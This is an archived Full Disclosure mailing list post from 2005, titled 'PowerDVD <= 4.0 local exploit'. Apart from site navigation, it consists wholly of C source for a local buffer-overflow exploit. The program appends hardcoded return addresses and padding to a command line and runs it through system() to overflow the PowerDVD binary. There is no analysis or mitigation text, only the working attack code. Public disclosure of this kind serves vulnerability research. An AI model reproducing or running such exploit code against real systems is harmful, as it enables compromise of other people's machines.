Nmap Security Scanner
*Intro
*Ref Guide
*Install Guide
*Download
*Changelog
*Book
*Docs
Security Lists
*Nmap Hackers
*Nmap Dev
*Bugtraq
*Full Disclosure
*Pen Test
*Basics
*More
Security Tools
*Pass crackers
*Sniffers
*Vuln Scanners
*Web scanners
*Wireless
*Exploitation
*Packet crafters
*More
Site News
Site Search:
Exploit World
Advertising
About/Contact
Credits
Sponsors:




fulldisclosure logo Full Disclosure mailing list archives

PowerDVD <= 4.0 local exploit
From: edward GAGNON <edward11 () postmaster co uk>
Date: Fri, 05 Aug 2005 15:23:18 +0100



#include <stdio.h>
#include <string.h>
#include <windows.h>

int main(int argc, char *argv[])
{

char cmd[500];
char *path;

printf("\n\n* usage: pdvdx.exe <path>\n\n");

if ( argc < 2 ) { printf(" need an argument!\n"); exit(0); }

path = argv[1];

sprintf(cmd, "%s ", path);
strcat(cmd, "\x44\x80\xC1\x77");
strcat(cmd, "\xDC\x7A\xC2\x77");
strcat(cmd, "\x35\x13\xC0\x77");

memset(cmd+strlen(cmd), 0x55, 299);

system(cmd);

exit(0);
}


_______________________________________________________________ 
Meet other people who share your interests.

http://www.homemaster.net - Homemaster. Come Together. Online.

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


  By Date           By Thread  

Current thread:
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]